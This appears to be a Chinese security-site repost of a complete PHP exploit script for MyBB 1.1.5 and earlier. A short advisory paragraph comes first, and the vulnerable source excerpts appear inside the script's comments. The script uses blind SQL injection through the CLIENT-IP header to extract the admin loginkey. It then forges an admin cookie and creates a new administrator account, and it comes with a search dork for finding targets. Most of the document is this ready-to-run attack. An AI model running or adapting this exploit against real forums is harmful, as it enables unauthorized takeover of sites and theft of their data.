MyBB Client-IP SQL注入漏洞 SQL, MyBB, 漏洞

xY7

MyBB不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。漏洞文件是'inc/functions.php'脚本对用户提交的CLIENT-IP http头字段缺少过滤，提交恶意SQL查询作为CLIENT-IP http头字段数据，可导致SQL注入攻击，可获得敏感信息。

1. #!/usr/bin/php -q -d short_open_tag=on
   
2. <?
   
3. echo "MyBulletinBoard (MyBB) <= 1.1.5 'CLIENT-IP' SQL injection / create new admin exploit\n";
   
4. echo "by rgod rgod@autistici.org\n";
   
5. echo "site: http://retrogod.altervista.org\n";
   
6. echo "dork, version specific: \"Powered By MyBB\" \"2006 MyBB Group\"\n\n";
   
7. /*
   
8. works regardless of php.ini settings
   
9. */
   
10. if ($argc<3) {
    
11. echo "Usage: php ".$argv[0]." host path OPTIONS\n";
    
12. echo "host:      target server (ip/hostname)\n";
    
13. echo "path:      path to MyBB\n";
    
14. echo "Options:\n";
    
15. echo "   -T[prefix]   specify a table prefix different from default (mybb_)\n";
    
16. echo "   -u[number]   specify a user id other than 1 (usually admin)\n";
    
17. echo "   -p[port]:    specify a port other than 80\n";
    
18. echo "   -P[ip:port]: specify a proxy\n";
    
19. echo "   -d:          disclose table prefix (reccomended)\n";
    
20. echo "Example:\r\n";
    
21. echo "php ".$argv[0]." localhost /MyBB/ -d\r\n";
    
22. echo "php ".$argv[0]." localhost /MyBB/ -Tmy_\r\n";
    
23. die;
    
24. }
    
25. /* software site: http://www.mybboard.com/
    
26. 
    
27.    vulnerable code in inc/functions.php near lines 1292-1320:
    
28. 
    
29.    ...
    
30.    function getip() {
    
31. global $_SERVER;
    
32. if($_SERVER['HTTP_X_FORWARDED_FOR'])
    
33. {
    
34. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
    
35. {
    
36. while(list($key, $val) = each($addresses[0]))
    
37. {
    
38. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
    
39. {
    
40. $ip = $val;
    
41. break;
    
42. }
    
43. }
    
44. }
    
45. }
    
46. if(!$ip)
    
47. {
    
48. if($_SERVER['HTTP_CLIENT_IP'])
    
49. {
    
50. $ip = $_SERVER['HTTP_CLIENT_IP'];
    
51. }
    
52. else
    
53. {
    
54. $ip = $_SERVER['REMOTE_ADDR'];
    
55. }
    
56. }
    
57. return $ip;
    
58. }
    
59. ...
    
60. 
    
61. you can spoof your ip address through the CLIENT-IP http header...
    
62. as result you can inject sql statements in class_session.php at lines 36-68:
    
63. by calling the main index.php script
    
64. ...
    
65. function init()
    
66. {
    
67. global $ipaddress, $db, $mybb, $noonline;
    
68. //
    
69. // Get our visitors IP
    
70. //
    
71. $this->ipaddress = $ipaddress = getip();
    
72. 
    
73. //
    
74. // User-agent
    
75. //
    
76. $this->useragent = $_SERVER['HTTP_USER_AGENT'];
    
77. if(strlen($this->useragent) > 100)
    
78. {
    
79. $this->useragent = substr($this->useragent, 0, 100);
    
80. }
    
81. 
    
82. //
    
83. // Attempt to find a session id in the cookies
    
84. //
    
85. if($_COOKIE['sid'])
    
86. {
    
87. $this->sid = addslashes($_COOKIE['sid']);
    
88. }
    
89. else
    
90. {
    
91. $this->sid = 0;
    
92. }
    
93. 
    
94. //
    
95. // Attempt to load the session from the database
    
96. //
    
97. $query = $db->query("SELECT sid,uid FROM ".TABLE_PREFIX."sessions WHERE sid='".$this->sid."' AND ip='".$this->ipaddress."'");
    
98. ...
    
99. 
    
100. injection is blind, but you can ask true-false questions to the database to
     
101. retrieve the admin loginkey.
     
102. Through that you can build an admin cookie and create a new admin user through
     
103. the admin/users.php script.
     
104. Also you can disclose table prefix.
     
105. 
     
106. --------------------------------------------------------------------------------
     
107. 
     
108. 
     
109. -*****************************************************************************-
     
110. *                                                                            *
     
111. * Italia - Germania 2-0, al 114' forse il pi? bel gol che abbia mai visto    *
     
112. * grazie Grosso!                                                             *
     
113. *                                                                            *
     
114. -*****************************************************************************-
     
115. */
     
116. 
     
117. error_reporting(0);
     
118. ini_set("max_execution_time",0);
     
119. ini_set("default_socket_timeout",5);
     
120. 
     
121. function quick_dump($string)
     
122. {
     
123.   $result='';$exa='';$cont=0;
     
124.   for ($i=0; $i<=strlen($string)-1; $i++)
     
125.   {
     
126.    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
     
127.    {$result.="  .";}
     
128.    else
     
129.    {$result.="  ".$string[$i];}
     
130.    if (strlen(dechex(ord($string[$i])))==2)
     
131.    {$exa.=" ".dechex(ord($string[$i]));}
     
132.    else
     
133.    {$exa.=" 0".dechex(ord($string[$i]));}
     
134.    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
     
135.   }
     
136. return $exa."\r\n".$result;
     
137. }
     
138. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
     
139. function sendpacketii($packet)
     
140. {
     
141.   global $proxy, $host, $port, $html, $proxy_regex;
     
142.   if ($proxy=='') {
     
143.     $ock=fsockopen(gethostbyname($host),$port);
     
144.     if (!$ock) {
     
145.       echo 'No response from '.$host.':'.$port; die;
     
146.     }
     
147.   }
     
148.   else {
     
149.    $c = preg_match($proxy_regex,$proxy);
     
150.     if (!$c) {
     
151.       echo 'Not a valid proxy...';die;
     
152.     }
     
153.     $parts=explode(':',$proxy);
     
154.     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
     
155.     $ock=fsockopen($parts[0],$parts[1]);
     
156.     if (!$ock) {
     
157.       echo 'No response from proxy...';die;
     
158.    }
     
159.   }
     
160.   fputs($ock,$packet);
     
161.   if ($proxy=='') {
     
162.     $html='';
     
163.     while (!feof($ock)) {
     
164.       $html.=fgets($ock);
     
165.     }
     
166.   }
     
167.   else {
     
168.     $html='';
     
169.     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
     
170.       $html.=fread($ock,1);
     
171.     }
     
172.   }
     
173.   fclose($ock);
     
174.   #debug
     
175.   #echo "\r\n".$html;
     
176. }
     
177. 
     
178. function make_seed()
     
179. {
     
180.    list($usec, $sec) = explode(' ', microtime());
     
181.    return (float) $sec + ((float) $usec * 100000);
     
182. }
     
183. srand(make_seed());
     
184. $anumber = rand(1,99999);
     
185. 
     
186. $host=$argv[1];
     
187. $path=$argv[2];
     
188. $port=80;
     
189. $prefix="mybb_";
     
190. $user_id="1";//admin
     
191. $proxy="";
     
192. $dt=0;
     
193. for ($i=3; $i<$argc; $i++){
     
194. $temp=$argv[$i][0].$argv[$i][1];
     
195. if ($temp=="-p")
     
196. {
     
197.   $port=str_replace("-p","",$argv[$i]);
     
198. }
     
199. if ($temp=="-P")
     
200. {
     
201.   $proxy=str_replace("-P","",$argv[$i]);
     
202. }
     
203. if ($temp=="-T")
     
204. {
     
205.   $prefix=str_replace("-T","",$argv[$i]);
     
206. }
     
207. if ($temp=="-u")
     
208. {
     
209.   $user_id=str_replace("-u","",$argv[$i]);
     
210. }
     
211. if ($temp=="-d")
     
212. {
     
213.   $dt=1;
     
214. }
     
215. }
     
216. if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
     
217. if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
     
218. 
     
219. if ($dt)
     
220. {
     
221. $sql="'suntzuuuu/*";
     
222. echo "sql -> ".$sql."\r\n";
     
223. $packet ="GET ".$p."index.php HTTP/1.0\r\n";
     
224. $packet.="CLIENT-IP: $sql\r\n";
     
225. $packet.="Host: ".$host."\r\n";
     
226. $packet.="Connection: Close\r\n\r\n";
     
227. sendpacketii($packet);
     
228. if (eregi("You have an error in your SQL syntax",$html))
     
229. {
     
230. $temp=explode("sessions",$html);
     
231. $temp2=explode(" ",$temp[0]);
     
232. $prefix=$temp2[count($temp2)-1];
     
233. echo "prefix -> ".$prefix;if ($prefix==""){echo "[no prefix]";}echo"\n";
     
234. }
     
235. else
     
236. {
     
237. echo "unable to disclose table prefix...\n";
     
238. }
     
239. sleep(1);
     
240. }
     
241. 
     
242. $chars[0]=0;//null
     
243. $chars=array_merge($chars,range(48,57)); //numbers
     
244. $chars=array_merge($chars,range(65,90));//A-Z letters
     
245. $chars=array_merge($chars,range(97,122));//a-f letters
     
246. $j=1;
     
247. $loginkey="";
     
248. while (!strstr($loginkey,chr(0)))
     
249. {
     
250. for ($i=0; $i<=255; $i++)
     
251. {
     
252. if (in_array($i,$chars))
     
253. {
     
254. $sql="99999999' UNION SELECT ASCII(SUBSTRING(loginkey,".$j.",1))=".$i.",0 FROM ".$prefix."users WHERE uid=1/*";
     
255. echo "sql -> ".$sql."\r\n";
     
256. $packet ="GET ".$p."index.php HTTP/1.0\r\n";
     
257. $packet.="CLIENT-IP: $sql\r\n";
     
258. $packet.="Host: ".$host."\r\n";
     
259. $packet.="Connection: Close\r\n\r\n";
     
260. sendpacketii($packet);
     
261. if (eregi("Hello There",$html)) {$loginkey.=chr($i);echo "loginkey -> ".$loginkey."[???]\r\n";sleep(1);break;}
     
262. }
     
263. if ($i==255) {die("Exploit failed...");}
     
264. }
     
265.   $j++;
     
266. }
     
267. $cookie="mybbuser=1_".trim(str_replace(chr(0),"",$loginkey))."; mybbadmin=1_".trim(str_replace(chr(0),"",$loginkey)).";";
     
268. echo "admin cookie -> ".$cookie."\r\n";
     
269. 
     
270. 
     
271. $data='-----------------------------7d62702f250530
     
272. Content-Disposition: form-data; name="action";
     
273. 
     
274. do_add
     
275. -----------------------------7d62702f250530
     
276. Content-Disposition: form-data; name="userusername";
     
277. 
     
278. suntzu'.$anumber.'
     
279. -----------------------------7d62702f250530
     
280. Content-Disposition: form-data; name="newpassword";
     
281. 
     
282. suntzu'.$anumber.'
     
283. -----------------------------7d62702f250530
     
284. Content-Disposition: form-data; name="email";
     
285. 
     
286. suntzoi@suntzu.org
     
287. -----------------------------7d62702f250530
     
288. Content-Disposition: form-data; name="usergroup";
     
289. 
     
290. 4
     
291. -----------------------------7d62702f250530
     
292. Content-Disposition: form-data; name="additionalgroups[]";
     
293. 
     
294. 4
     
295. -----------------------------7d62702f250530
     
296. Content-Disposition: form-data; name="displaygroup";
     
297. 
     
298. 4
     
299. -----------------------------7d62702f250530
     
300. Content-Disposition: form-data; name="Add User";
     
301. 
     
302.   Add User
     
303. -----------------------------7d62702f250530--
     
304. ';
     
305. 
     
306. $packet="POST ".$p."admin/users.php HTTP/1.0\r\n";
     
307. $packet.="User-Agent: Googlebot/2.1\r\n";
     
308. $packet.="Host: ".$host."\r\n";
     
309. $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
     
310. $packet.="Content-Length: ".strlen($data)."\r\n";
     
311. $packet.="Cookie: ".$cookie."\r\n";
     
312. $packet.="Connection: Close\r\n\r\n";
     
313. $packet.=$data;
     
314. sendpacketii($packet);
     
315. if (eregi("The user has successfully been added",$html))
     
316. {
     
317.   echo "exploit succeeded... now login as admin\n";
     
318.   echo "with username \"suntzu".$anumber."\" and password \"suntzu".$anumber."\"\n";
     
319. }
     
320. else
     
321. {
     
322.   echo "something goes wrong...\n";if(!$dt)echo "you may try -d option\n";
     
323. }
     
324. ?>

复制代码